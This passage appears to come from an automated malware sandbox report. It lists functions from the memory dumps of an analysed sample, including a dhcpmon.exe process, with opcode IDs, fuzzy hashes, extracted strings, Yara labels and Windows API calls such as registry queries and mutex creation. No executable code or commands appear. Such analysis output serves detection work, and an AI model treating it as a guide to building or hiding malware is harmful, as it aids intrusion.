                                              • Instruction ID: 6b2f83a89956ce5e0a15bd9bdfc1e7a8a09edb43e87d42da7813c272b2e3cf15
                                              • Opcode Fuzzy Hash: df6bb6bafc01e4926b2b9605354f668ae7656e2c985c08cad14ff8475b490f23
                                              • Instruction Fuzzy Hash: 6FC04C4582DBC04EDF03066418146553FF198631157C940DAE9C389767D508491A9223
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022EF053, Relevance: .0, Instructions: 10COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d4040057e97d1fa880ca8d1f2497e63e61cbf4ae12781595fc283636e7cf053
                                              • Instruction ID: f62d849929c95a5109c05d1f17cf4dbf194795a390d28409ff4a3d66950573b5
                                              • Opcode Fuzzy Hash: 0d4040057e97d1fa880ca8d1f2497e63e61cbf4ae12781595fc283636e7cf053
                                              • Instruction Fuzzy Hash: 93C04C36A141098EDF009BD4F5453ECB761E78032AF100066D21E51445967906599691
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E2EC0, Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4180dfb47e770af5195c78427875ae49b2c278ad848cec244c22e2c28969c60f
                                              • Instruction ID: 0834d6817aa8171df872ea7517b91a9c5105aa616f245035722573fd2051c0da
                                              • Opcode Fuzzy Hash: 4180dfb47e770af5195c78427875ae49b2c278ad848cec244c22e2c28969c60f
                                              • Instruction Fuzzy Hash: BFB0123021471A8B1B50A7F12C08B12338C8640506B8810609C0EC0000FA04E0903150
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022EF310, Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 189d386257dcb7193b397870e6ab4135475b287497bc4bd58717d48e79559983
                                              • Instruction ID: 5770a5a1da384076145cd37dd80eb8189f36dea4d18c8ef6b5277f9f77cb3eff
                                              • Opcode Fuzzy Hash: 189d386257dcb7193b397870e6ab4135475b287497bc4bd58717d48e79559983
                                              • Instruction Fuzzy Hash: 21B0123094570C4BCE8073F0640811D774E19C0511FC000115D0E47700BE78A5408D95
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E6F74, Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
                                              • Instruction ID: 52a7f06b27bd0c9183e587cb09485e9243884753300f90227590c985375cd7c0
                                              • Opcode Fuzzy Hash: 9331830965d72d12fcbefa973c87c0cf332396a92bd300e1243d284f656f33ac
                                              • Instruction Fuzzy Hash: 76B092B7A14009C9DF008AC4B4413EDF724EBA0229F104033C31252000C2720164D6D2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022ED160, Relevance: .0, Instructions: 8COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5e47ff007554970e3d9a101547c567e0ef7950e80bbd3122e5925e4e4ea22019
                                              • Instruction ID: c2e419e4d99d87793c7677ca6980d80b67b3c02147f0e9fcf979e7fe177ea48a
                                              • Opcode Fuzzy Hash: 5e47ff007554970e3d9a101547c567e0ef7950e80bbd3122e5925e4e4ea22019
                                              • Instruction Fuzzy Hash: 82B09230029748D78B00A795EC4A85A3A2DB94A2217C05124E9034A1AE9BF56942E6E6
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Non-executed Functions

                                              Function 022E969B, Relevance: 2.7, Strings: 2, Instructions: 222COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $>_?r
                                              • API String ID: 0-334426466
                                              • Opcode ID: fe316e15297c2fdd4d753ef37b2b8390f0b0ac73659707ed29bd0bbfacd9befd
                                              • Instruction ID: c25b1b3a4f336db9d631ee6072d607cb716748076dc749822c6389fafc316e8e
                                              • Opcode Fuzzy Hash: fe316e15297c2fdd4d753ef37b2b8390f0b0ac73659707ed29bd0bbfacd9befd
                                              • Instruction Fuzzy Hash: CC6105B1F242018FCF14CFB988401EEBBB2EBC5210794887BC51BDB259DB719886CB51
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0004524A, Relevance: .6, Instructions: 585COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.592804295.0000000000042000.00000002.00020000.sdmp, Offset: 00040000, based on PE: true
                                              • Associated: 00000004.00000002.592781888.0000000000040000.00000002.00020000.sdmp Download File
                                              • Associated: 00000004.00000002.592910612.0000000000062000.00000002.00020000.sdmp Download File
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8098e29a36d30d9914beb125c3c34926cfb2a16b1f5591641f6e75a409070f65
                                              • Instruction ID: 7349f13cda46332281af6f0e02efa10a2c9eb18c14787b6d714f094c5aa4b211
                                              • Opcode Fuzzy Hash: 8098e29a36d30d9914beb125c3c34926cfb2a16b1f5591641f6e75a409070f65
                                              • Instruction Fuzzy Hash: 4E3274A244F7C14FD7635B788CB86A17FB1AE6321470E49DBC4C1CF4A3EA19191AC722
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E9388, Relevance: .2, Instructions: 239COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4093de69a792baba5e611423e2f672b654a10d45402ec7c422565bdc60819001
                                              • Instruction ID: e5d5d8c1cf60f7b4bc82d03b8cf2f1a2a9f33c855b47a3d7ffb1bf68e5cc7b43
                                              • Opcode Fuzzy Hash: 4093de69a792baba5e611423e2f672b654a10d45402ec7c422565bdc60819001
                                              • Instruction Fuzzy Hash: 3E81A271F211159BDB14DBA9D880AAEBBF3AFC4310F6A8076E406DB359DE719C41CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E306F, Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 640dbcb687c3e8f2dfb4dbd76db7072e55cd4e0b5c1c41b6dfeae84564427fc5
                                              • Instruction ID: 924a79f6e860491c0a6fd6457c9801ae3638a7e343d3ace3723bd90edd58367f
                                              • Opcode Fuzzy Hash: 640dbcb687c3e8f2dfb4dbd76db7072e55cd4e0b5c1c41b6dfeae84564427fc5
                                              • Instruction Fuzzy Hash: E0519F72F115158BDB54DBADC950A6EBBE3AFC8711F2A8064E40ADB369DE319C018B80
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E944F, Relevance: .2, Instructions: 179COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fe48d237a72985a5dcba152600455725ca44c358732bf07a5b38ed6e2a5f148d
                                              • Instruction ID: 41ab1843f2e40b4a46d07c8783b840ffc3217e6d9ef0fc4c1bd1e2153e179398
                                              • Opcode Fuzzy Hash: fe48d237a72985a5dcba152600455725ca44c358732bf07a5b38ed6e2a5f148d
                                              • Instruction Fuzzy Hash: AB517E72F115158BDB54DBADC980A6EBBE3AFC4710F2A8076E406DB369DE31DD418780
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E0D93, Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: ,:ar$0`r$:@:r$X1ar
                                              • API String ID: 0-2614842347
                                              • Opcode ID: 0d3df7d21558900b2f73078652ac2b5863438625c897ca835f342c7dc67689f2
                                              • Instruction ID: 70991553669d2197d476d3423cf0c00b25ed112cfee9ecd4b87bd341f8ed5ad7
                                              • Opcode Fuzzy Hash: 0d3df7d21558900b2f73078652ac2b5863438625c897ca835f342c7dc67689f2
                                              • Instruction Fuzzy Hash: 8DB1D770A09344CFD3A4DF78C161B6ABBE2BBD8704F60896DE5498B398DF759841CB42
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 022E01B8, Relevance: 5.1, Strings: 4, Instructions: 78COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.595569976.00000000022E0000.00000040.00000001.sdmp, Offset: 022E0000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: hfe$hfe$hfe$hfe
                                              • API String ID: 0-729514276
                                              • Opcode ID: d134c07cf4d631608ba0d04c42877009abd300b243ba1fc6ef4ce7e8a0576b50
                                              • Instruction ID: b63495e59ba93d5db64be1b31a02df71e6d892c60357d6abba5c03f74b69e1dd
                                              • Opcode Fuzzy Hash: d134c07cf4d631608ba0d04c42877009abd300b243ba1fc6ef4ce7e8a0576b50
                                              • Instruction Fuzzy Hash: 722112707012159FEB50CEA8D880F267BEAFFC5B54F900469F506AB384EBB5BC018B65
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Analysis Process: dhcpmon.exe PID: 6952 Parent PID: 3440 dhcpmon.exeCOMMON

                                              Executed Functions

                                              Function 05433850, Relevance: 2.0, Strings: 1, Instructions: 747COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: >_?r
                                              • API String ID: 0-2961507119
                                              • Opcode ID: fb5b5e23f9e7b06b8518951f86b8ed2bff9bdc41bf9d13758168c83d3654be38
                                              • Instruction ID: 1fc848b47bf6ae69f5c279f970c1240f9175f37e420b565ef7b8dd298dcb942d
                                              • Opcode Fuzzy Hash: fb5b5e23f9e7b06b8518951f86b8ed2bff9bdc41bf9d13758168c83d3654be38
                                              • Instruction Fuzzy Hash: A842C271A00215DFCB14CF58C9869EABBF6FF88310B15C9A6D9199B326D771EC42CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 054323A0, Relevance: .5, Instructions: 505COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 4ecbe7fdf25dbf3e3e76bfaf58896018e23e3b3558977801d782869cc95ab92c
                                              • Instruction ID: 07f70267df5cebbce8b0ba0c61e0443dc41bfd424b992a203070412227fd9ad3
                                              • Opcode Fuzzy Hash: 4ecbe7fdf25dbf3e3e76bfaf58896018e23e3b3558977801d782869cc95ab92c
                                              • Instruction Fuzzy Hash: 6112B034A08215CFCB24CF29D5856AEBBF3FF98304F25856AD4069B361DBB59C86CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05432FA8, Relevance: .2, Instructions: 239COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0744fd872de0d120a0f61eba1faa1ac3655d5809cf790493afa3b6a5399139e3
                                              • Instruction ID: 761fcf1e198699d8a0dc05576be3a159cc9582a5a633e6c6ee1b6b400efb08c3
                                              • Opcode Fuzzy Hash: 0744fd872de0d120a0f61eba1faa1ac3655d5809cf790493afa3b6a5399139e3
                                              • Instruction Fuzzy Hash: A8819C31F011159BDB04DF69D895AAEBBF3AFC8710F2A84A6D405EB369DE319C01CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 054309A0, Relevance: 5.2, Strings: 4, Instructions: 177COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: X1ar$X1ar$X1ar$X1ar
                                              • API String ID: 0-346077691
                                              • Opcode ID: 1f53986c35cbf658dab03d72eacf8a0dd7c89033ef433cbc9e5651571a11a94f
                                              • Instruction ID: aba749eef81cd73fbd44208ef8bef271684e5d14f2dec3c94436f24a35fc1087
                                              • Opcode Fuzzy Hash: 1f53986c35cbf658dab03d72eacf8a0dd7c89033ef433cbc9e5651571a11a94f
                                              • Instruction Fuzzy Hash: AF51A631B00215DFCB14DBA4D85DBAEB7A3FF88714F2185A6D50A9B360DB319D06CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 054302E8, Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: :@:r$`5ar
                                              • API String ID: 0-3512261011
                                              • Opcode ID: fe0c8a940cfcce67025f1fbd3b7c669749400638764412cf424588189c0d1919
                                              • Instruction ID: 9e8c6a9f9c05359a7fad4c379ffb45cd3f7528ba1be5f30350be446b0218c078
                                              • Opcode Fuzzy Hash: fe0c8a940cfcce67025f1fbd3b7c669749400638764412cf424588189c0d1919
                                              • Instruction Fuzzy Hash: 1E518E30A04205CFDB08DF68D455BAE7BF2EF88700F14856AD50AAB765DB71AC06CB92
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05430682, Relevance: 2.6, Strings: 2, Instructions: 128COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: Z!p^$Y!p^
                                              • API String ID: 0-4260723622
                                              • Opcode ID: bae582a056f2e4bff2179b2d2ca83a7d16dfea8486c110d8bf563da93703d963
                                              • Instruction ID: be6b22bd135a30c2d555abeef4599dcb7540045865afeb7cea613dd9da0fd86b
                                              • Opcode Fuzzy Hash: bae582a056f2e4bff2179b2d2ca83a7d16dfea8486c110d8bf563da93703d963
                                              • Instruction Fuzzy Hash: 5F419030B80210CBE734AB38E91D66E7BA7FF94705B168A6AE403C7364DF714C598B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 05432D58, Relevance: 2.6, Strings: 2, Instructions: 123COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $>_?r
                                              • API String ID: 0-334426466
                                              • Opcode ID: b072c5e3d948aa0fe71655eb2f3622d68fe6e09578b6aeb3fa220b8cf06e5baa
                                              • Instruction ID: 9c83a39e45dd0ae89cc2c59c12dc8a10243637c2f0d776c6335b2a58e928aa45
                                              • Opcode Fuzzy Hash: b072c5e3d948aa0fe71655eb2f3622d68fe6e09578b6aeb3fa220b8cf06e5baa
                                              • Instruction Fuzzy Hash: FB41B234E08215DBCB10DF69C8835FEB763BBC8215B25C867C4169B725C7B5E8078B91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 054312A0, Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375512826.0000000005430000.00000040.00000001.sdmp, Offset: 05430000, based on PE: false
                                              Similarity
                                              • API ID:
                                              • String ID: $g^r
                                              • API String ID: 0-3653196314
                                              • Opcode ID: 1846bdb2e7c2e8ab40d09b379878f41c099045687ddc46523a7d73b3b138a814
                                              • Instruction ID: 35a1f4741acc82f82df906b20c49a070a3f60736a14b6bc071244f68cd239002
                                              • Opcode Fuzzy Hash: 1846bdb2e7c2e8ab40d09b379878f41c099045687ddc46523a7d73b3b138a814
                                              • Instruction Fuzzy Hash: F1221674A00605CFC724DF28D484AAABBF2FF88310F50859AD85A9B765DB35ED85CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1AA02, Relevance: 1.6, APIs: 1, Instructions: 92registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02D1AAB1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: a61d71e12a519b1049cd209b657db8b5f5709b4815c6cd634170d6ee03648b5e
                                              • Instruction ID: 47be3c61f491321792bcec6095caff9c0b5181843033fb48db9248d8c572057c
                                              • Opcode Fuzzy Hash: a61d71e12a519b1049cd209b657db8b5f5709b4815c6cd634170d6ee03648b5e
                                              • Instruction Fuzzy Hash: 8C31B472544384BFE7228B25DC45F67BFACEF06710F08849BED819B252D264A809CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 055700F6, Relevance: 1.6, APIs: 1, Instructions: 89synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0557019D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375958650.0000000005570000.00000040.00000001.sdmp, Offset: 05570000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              • Opcode ID: 2702ab997db145b90fddd2e4427ae385b8e23db57e440ae5e920ea8e526687c3
                                              • Instruction ID: ef51e946bf711af031b50a8045c9124f9d511f87a35f183ac3c55b31988b09dd
                                              • Opcode Fuzzy Hash: 2702ab997db145b90fddd2e4427ae385b8e23db57e440ae5e920ea8e526687c3
                                              • Instruction Fuzzy Hash: 21319171509784AFE712CF25DC85F56FFE8FF06210F08849AE984CB292D375A909CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1AAF9, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,E9AA1EF0,00000000,00000000,00000000,00000000), ref: 02D1ABB4
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              • Opcode ID: 69c711e7ca426fc27648524c6e9604df5374692578f20835a76f0759223a863e
                                              • Instruction ID: 8b2340e2b5aa70f788030397a187b66098e5e65efdcd48e29195d32ff1c6e447
                                              • Opcode Fuzzy Hash: 69c711e7ca426fc27648524c6e9604df5374692578f20835a76f0759223a863e
                                              • Instruction Fuzzy Hash: CF31C471109384AFE722CF65DC44F62BFF8EF06310F08849AE985CB252D360E848CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1AF50, Relevance: 1.6, APIs: 1, Instructions: 82COMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateActCtxA.KERNEL32(?,00000E2C,?,?), ref: 02D1AFEA
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Create
                                              • String ID:
                                              • API String ID: 2289755597-0
                                              • Opcode ID: e885c2dce19aa8405d22bd9fef76bb5ce6940dcc02a5f184c53668ae0bb08cbd
                                              • Instruction ID: 579e05ed86df1afef6f3551152f7c74aa31eeab8deaec35175c5ff8a74b24f15
                                              • Opcode Fuzzy Hash: e885c2dce19aa8405d22bd9fef76bb5ce6940dcc02a5f184c53668ae0bb08cbd
                                              • Instruction Fuzzy Hash: 2621957540E3C06FD7138B259C51B61BFB4EF87610F0A41DBE984CB6A3D224A919C7B2
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1AA32, Relevance: 1.6, APIs: 1, Instructions: 74registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegOpenKeyExW.KERNELBASE(?,00000E2C), ref: 02D1AAB1
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Open
                                              • String ID:
                                              • API String ID: 71445658-0
                                              • Opcode ID: 749bf3c58cba3cb703dced10881a6b3333a4866dd8fdce4bbeef8ce4ce9fb268
                                              • Instruction ID: 5a9f925fd08f5f93a4dbd3e8d000d182d14ef9c84a7629dd9acc5687cadd7e79
                                              • Opcode Fuzzy Hash: 749bf3c58cba3cb703dced10881a6b3333a4866dd8fdce4bbeef8ce4ce9fb268
                                              • Instruction Fuzzy Hash: 60218B72500604AEE7219B25DD84F6BFBECEF08720F14895AEE459B681D674E808CBB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0557012A, Relevance: 1.6, APIs: 1, Instructions: 72synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateMutexW.KERNELBASE(?,?), ref: 0557019D
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.375958650.0000000005570000.00000040.00000001.sdmp, Offset: 05570000, based on PE: false
                                              Similarity
                                              • API ID: CreateMutex
                                              • String ID:
                                              • API String ID: 1964310414-0
                                              • Opcode ID: 1a3dfc534aad8e4fd94ae1ade5d4eabff0dae62f3c1d157709961e635909a069
                                              • Instruction ID: c3c385097cb35efafacba20a38a16e2885b4724f001a23ec2504cfd9f9d1b321
                                              • Opcode Fuzzy Hash: 1a3dfc534aad8e4fd94ae1ade5d4eabff0dae62f3c1d157709961e635909a069
                                              • Instruction Fuzzy Hash: 3E218B71504244AFE720DF25DC89F6AFBE8FF45620F1884AAED498B291E7B1E504CB71
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1AB3A, Relevance: 1.6, APIs: 1, Instructions: 69registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegQueryValueExW.KERNELBASE(?,00000E2C,E9AA1EF0,00000000,00000000,00000000,00000000), ref: 02D1ABB4
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: QueryValue
                                              • String ID:
                                              • API String ID: 3660427363-0
                                              • Opcode ID: 53ece1cadfd0b27f9d28b03f9bcaaf048a629e466a9a830364dc61fd19bfd6f4
                                              • Instruction ID: ecca0a420add5c25aa436bb5e6e6cddad5279660af628ec422ce4a771c2cafd9
                                              • Opcode Fuzzy Hash: 53ece1cadfd0b27f9d28b03f9bcaaf048a629e466a9a830364dc61fd19bfd6f4
                                              • Instruction Fuzzy Hash: 4A215875601644AFE720CE25ED80F66BBE8EF04710F14846AEA459B651D7A0E808CAB1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1B7CA, Relevance: 1.6, APIs: 1, Instructions: 61windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 02D1B841
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 3a7867fc39dfacec46e26f492a53789abc06cd896fb76868eefab9537806ad63
                                              • Instruction ID: 2fd067dc47b49bc113e4e05761e9c8e4114e90fb63a71ef95f96f0c46db66bf1
                                              • Opcode Fuzzy Hash: 3a7867fc39dfacec46e26f492a53789abc06cd896fb76868eefab9537806ad63
                                              • Instruction Fuzzy Hash: 862190754097C0AFDB128B21DC50AA2BFB0EF17314F0D84DAEDC44F663D265A958DB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1A51F, Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                              Download Yara Rule
                                              APIs
                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02D1A58A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: DuplicateHandle
                                              • String ID:
                                              • API String ID: 3793708945-0
                                              • Opcode ID: 5f354041ffc019c928d55cf20022ed166a150ac0478f456a7beef224d6f12ebd
                                              • Instruction ID: 79ada1eae962165d73fe42cafa8d3b333d61a1b69dae66334961a2897530d2b0
                                              • Opcode Fuzzy Hash: 5f354041ffc019c928d55cf20022ed166a150ac0478f456a7beef224d6f12ebd
                                              • Instruction Fuzzy Hash: D4118471409380AFDB228F55DC44B62FFF8EF4A210F0884DAEE858B652D375A518DB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1BB4F, Relevance: 1.6, APIs: 1, Instructions: 59windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • PostMessageW.USER32(?,?,?,?), ref: 02D1BBB9
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: MessagePost
                                              • String ID:
                                              • API String ID: 410705778-0
                                              • Opcode ID: 0b11ca6cb2b6e50c81682b9f5ea03a3805bdffd8ea312b97ee67f42c3464c713
                                              • Instruction ID: 447ad65bfd2d7a3dbfebf95f8589f6227a6d34ae6d37ca9080b6b19ec94ead71
                                              • Opcode Fuzzy Hash: 0b11ca6cb2b6e50c81682b9f5ea03a3805bdffd8ea312b97ee67f42c3464c713
                                              • Instruction Fuzzy Hash: 7C11D3354093C0AFDB228F25DC45B52FFB4EF06220F0884DFED858B663D265A818DB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1BE05, Relevance: 1.6, APIs: 1, Instructions: 58windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • DispatchMessageW.USER32(?), ref: 02D1BE70
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: DispatchMessage
                                              • String ID:
                                              • API String ID: 2061451462-0
                                              • Opcode ID: 5008035a84fb4e57c728d95de9732385957f031f449ae4021c8ac08a041b3d68
                                              • Instruction ID: 2e78255acd4fb6e2337725aa3e7ac8610bcc3d9cb239778262f1ec6ac8e09330
                                              • Opcode Fuzzy Hash: 5008035a84fb4e57c728d95de9732385957f031f449ae4021c8ac08a041b3d68
                                              • Instruction Fuzzy Hash: 63117C754093C0AFDB128B259C84B62BFB4EF47624F0984DBED848F263D2656808CB62
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1B71E, Relevance: 1.6, APIs: 1, Instructions: 57windowCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateIconFromResourceEx.USER32 ref: 02D1B78A
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: CreateFromIconResource
                                              • String ID:
                                              • API String ID: 3668623891-0
                                              • Opcode ID: 79db538eaaf3bba17b0628a6017800257e7e14392d6f5b876bc79412e7cc21b8
                                              • Instruction ID: fe776f5863b292918caed8ae14c0abcb380596075675136425323d5272e96692
                                              • Opcode Fuzzy Hash: 79db538eaaf3bba17b0628a6017800257e7e14392d6f5b876bc79412e7cc21b8
                                              • Instruction Fuzzy Hash: B6117235408384AFDB228F55DC84B52FFF4EF49310F08859EEE858B662D375A458DB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 02D1A75B, Relevance: 1.6, APIs: 1, Instructions: 52comCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.374606741.0000000002D1A000.00000040.00000001.sdmp, Offset: 02D1A000, based on PE: false
                                              Similarity
                                              • API ID: Initialize
                                              • String ID:
                                              • API String ID: 2538663250-0
